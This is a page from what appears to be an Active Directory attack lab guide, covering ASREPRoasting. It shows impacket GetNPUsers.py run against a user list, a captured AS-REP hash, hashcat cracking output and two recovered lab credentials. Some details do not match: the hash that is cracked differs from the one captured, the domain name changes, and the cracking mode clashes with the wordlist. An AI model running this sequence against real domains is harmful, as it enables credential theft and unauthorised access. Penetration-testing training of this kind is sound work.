Attacking Active Directory
  • Reconnaissance
    • Enumerate Network
    • Enumerating Users With CME - Anonymously
    • Enumerate Users Anonymously - RPC
    • Enumerating User with Ldapsearch and enum4linux - Anonymously
    • Enumerate Guest Access on Shares - CME
  • Exploiting With Poison and Relay
    • Responder
    • NTLM relay
    • Secretsdump
    • Lsassy
    • DonPapi
    • Pass The Hash with Winpexec.py
    • Pass The Hash with Evil-Winrm
    • Pass the Hash with CrackMapExec
    • Coerced auth smb + ntlmrelayx to ldaps with drop the mic
  • User Enumeration Exploit
    • setup /etc/hosts and kerberos
    • Exploiting Username - ASREPRoast
    • Password Spraying
    • User listing with GetADUsers and ldapsearch
    • Kerberoasting
    • Powerview
      • Setting Up PowerView
      • Get-NetUser
      • Get-NetGroup
      • Get-NetComputer
      • Get-NetFileServer
      • Get-NetGPO
      • Get-ObjectAcl
      • Get-NetDomainTrust
      • Invoke-Portscan
    • Enumerate Shares with User Account
  • Exploiting with Users
    • SamAccountName (NoPac)
      • Semi Manual Exploit
      • From Linux With NoPAC.py
      • From Windows With noPAC.exe
    • PrintNightmare - Bronx
      • Check and Prepare
      • windows and linux
    • PrintNightmare - Baltimore
      • Exploit
  • WSUS Exploit
  • Active Directory Certificate Services (ADCS)
    • Bloodhound
      • Bloodhound - Install Neo4j
      • Run BloodHound
      • ADCS reconnaissance and enumeration (with certipy and bloodhound)
    • ESC8 - coerce to domain admin
    • ESC8 - with certipy
    • ADCS - ESC1
    • ADCS - ESC2 & ESC3
    • ADCS - ESC4
    • ADCS - ESC6
    • Certifried - CVE-2022–26923
    • Shadow Credentials
  • Metasploit
    • Initial Shell Shell Shell
    • Enumeration 1 - Users, Groups, Computers
    • Enumeration 2 - Arp, Tokens, Patches
    • Enumeration 3 - Shares, SMB, and More
    • Back Door Add User
    • Metasploit Exploit Suggester
    • HashDump With Metasploit
    • Lateral Movement With Metasploit
    • DsSync With Metasploit from NT Autority/System to Administrator
    • Golden Ticket with Metasploit
    • Using a Keylogger with Metasploit
    • BackDoor Meterpreter Service
  • Privilege Escalation
  • User ACL Exploits
    • Hunting with bloodhound
    • ACL With BloodHound
    • ForceChangePassword on User (Donald-> Hugo)
    • GenericWrite on User (Hugo -> Ramon)
    • WriteDacl on User (Ramon-> Nicolas)
    • Add self on Group (Nicolas-> RadioCity)
    • AddMember on Group (RadioCity -> EmpireState)
    • WriteOwner on Group (EmpireState -> CentralPark)
    • Generic all on user (CentralPark -> diego.Montenegro)
      • machine account to administrator shell
      • Silver ticket
    • GPO abuse
    • Read Laps password
  • MSSQL servers Exploitation
    • Enumerate the MSSQL servers
    • Enumerate MSSQL servers with GetUserSPNs & NMAP
    • Enumerate MSSQL servers with CrackMap & Impacket
    • impersonate - execute as login
    • MSSQL Coerce and relay
    • MSSQL trusted links
    • MSSQL Command execution to shell - Yonkers
    • MSSQL Command execution to shell - Salisbury
  • Delegations
    • Unconstrain
    • Constrain Delegation
      • With Protocol Transmition
      • Without protocol transition
    • Resource Based Constrained Delegation
    • Unconstrained delegation Enum
  • Trust
    • Enumerate Trust
    • Domain Trust - child/parent (north.newyork.local -> newyork.local)
      • RaiseMeUp - Escalate with impacket raiseChild
      • Golden ticket + ExtraSid
      • Trust ticket - forge inter-realm TGT
    • Forest Trust (newyork.local -> maryland.local)
      • Foreign group and users
      • Use unconstrained delegation
      • Mssql Trusted link
      • Golden ticket with external forest, sid history ftw ( Maryland-> NewYork)
      • Trust ticket with external forest ( maryland.local-> newyork.local)
      • Exploit acl with external trust golden ticket
  • Exploiting IIS & Privilege escalation
    • IIS - webshell
    • Privesc SeImpersonatePrivilege
    • winPeas without touching disk
    • SeImpersonatePrivilege to Authority\system
    • KrbRelay Up - Linux
    • KrbRelay Up - Windows - PowerPack
    • KrbRelay Up - Windows V2
  • Impacket
    • Install Impacket
    • Getting Initial Shell
Powered by GitBook
On this page
  1. User Enumeration Exploit

Exploiting Username - ASREPRoast

Previoussetup /etc/hosts and kerberosNextPassword Spraying

Last updated 2 years ago

The ASREPRoast attack looks for users without Kerberos pre-authentication required attribute ().

That means that anyone can send an AS_REQ request to the DC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.

Furthermore, no domain account is needed to perform this attack, only connection to the DC. However, with a domain account, a LDAP query can be used to retrieve users without Kerberos pre-authentication in the domain. Otherwise usernames have to be guessed.

ASREP - roasting

We create a users.txt file with all the user name previously found on north.sevenkingdoms.local

cat users.txt

Administrator
vagrant
krbtgt
newyork$
pablo.Sandoval
fernando.Alonzo
valentino.alcantara
matias.Almonte
alejandro.Rodriguez
claudio.Ortiz
salvador.Aguilar
pacofish
elena.Lopez
miguel.Cabrera
joel.exposito
sql_svc

We now could try asreproasting on all the users with impacket:

GetNPUsers.py north.newyork.local/ -no-pass -usersfile users.txt
Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra


[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User vagrant doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User newyork$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User pablo.Sandoval doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fernando.Alonzo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User valentino.alcantara doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User matias.Almonte doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User alejandro.Rodriguez doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$claudio.Ortiz@NORTH.NEWYORK.LOCAL:da4d51f644d3ecb45e27f06ece85208a$6309c44863f889a9d8e4110fe174ca5f67826b6215472e897637943ea4af45d172faaccf6529365d0d3949d52c6a8905b7691aa53c1593bbb34cd74306468e77bec9f2b54f333dff724bed1083cdbe77bafacc4ff30ce815720413ee7e68e328ab3b5378c8c05fb7554bde27e2a81c377158bc92f0d1c1d31157f74d9fa00499076eb78cb77ca550b64cbd807b6a2d9999aec3ed82a02508e135f8a88797d11004badc734c1dc146a21822f48470be75f23c3b9b1c67a63c0e0265252fc24cab1521ee209627206d3fc28927717e8ec72be6b2285a77b7ca04d0ae74c2ce37aa194f762d32c70687a4f6074223e39a77b7af0616eb7acae8b040
[-] User salvador.Aguilar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User pacofish doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User elena.Lopez doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User miguel.Cabrera doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User joel.exposito doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set

  • We get a ticket for claudio.ortiz and we will try to break it the user don’t require kerberos pre-authentication.

  • This needs to be done on your local machine


#move rockyou.txt.gz to your current directory
sudo mv /usr/share/wordlists/rockyou.txt.gz .

#unzip rockyou.txt.gz
gzip -d rockyou.txt.gz

#let's start cracking
hashcat -m 18200 '$krb5asrep$23$claudio.Ortiz@NORTH.NEWYORK.LOCAL:8e75978f6243551a3faf9c5632763627$f07b53f1af9ef89392c6097c8c60e95a400040b4ec23c986fc96d4b0dca59978cd5d2c917667a2ff6f0acb292df72360ba334a8153bd686b29245af993a268927a3b8b2317933802ff9360ddb86b503de8ee7f0917302c699f1e3819c7ffe65d989dc1e0925cc5baf62cbc083920f043a18bbb2a397fc72cfc9944e7d0167040588ce708aedca46d1e66d0b398e647c3158e8c69b5e8fa19a23ff1c7f4517a6f6210ceb5e2eccc6f520180303daaaa2dbeaf1e16c55cca50ea3db870b521cc8c14a51f3c6fc4f31766c6aa328c596380f417d82d78c31047e20ed6a29cdc6d34dafd8d83cf57582e5b4a3a04a14c4490f55be11c239f8c121306' -a 3 rockyou.txt

-m = is the mode (18200 | Kerberos 5, etype 23, AS-REP)
-a = --attack-mode = (0 | Straight, 1 | Combination, 3 | Brute-force ,6 | Hybrid Wordlist + Mask, 7 | Hybrid Mask + Wordlist)




$krb5asrep$23$claudio.Ortiz@NORTH.NEWYORK.LOCAL:8e75978f6243551a3faf9c5632763627$f07b53f1af9ef89392c6097c8c60e95a400040b4ec23c986fc96d4b0dca59978cd5d2c917667a2ff6f0acb292df72360ba334a8153bd686b29245af993a268927a3b8b2317933802ff9360ddb86b503de8ee7f0917302c699f1e3819c7ffe65d989dc1e0925cc5baf62cbc083920f043a18bbb2a397fc72cfc9944e7d0167040588ce708aedca46d1e66d0b398e647c3158e8c69b5e8fa19a23ff1c7f4517a6f6210ceb5e2eccc6f520180303daaaa2dbeaf1e16c55cca50ea3db870b521cc8c14a51f3c6fc4f31766c6aa328c596380f417d82d78c31047e20ed6a29cdc6d34dafd8d83cf57582e5b4a3a04a14c4490f55be11c239f8c121306:babyboy
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$claudio.Ortiz@NORTH.NEWYORK.LOCAL:8e7...121306
Time.Started.....: Wed Feb 22 08:32:49 2023 (0 secs)
Time.Estimated...: Wed Feb 22 08:32:49 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: babyboy [7]
Guess.Queue......: 286/14336793 (0.00%)
Speed.#1.........:    10958 H/s (0.01ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: babyboy -> babyboy
Hardware.Mon.#1..: Util: 46%

Started: Wed Feb 22 08:32:23 2023
Stopped: Wed Feb 22 08:32:50 2023

We now have two couple of credentials

miguel.cabrera = ilovebaseball
claudio.ortiz = babyboy
DONT_REQ_PREAUTH